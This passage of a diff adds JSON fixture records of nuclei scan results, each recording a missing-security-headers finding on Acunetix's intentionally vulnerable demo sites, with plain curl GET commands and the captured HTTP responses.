GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 433, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:41:05.447Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 434, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:41:05.596Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 435, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:05.735Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 436, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:41:05.875Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 437, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:41:06.015Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 438, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:41:06.159Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 439, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:41:06.300Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 440, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:41:06.451Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 441, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:06.598Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n 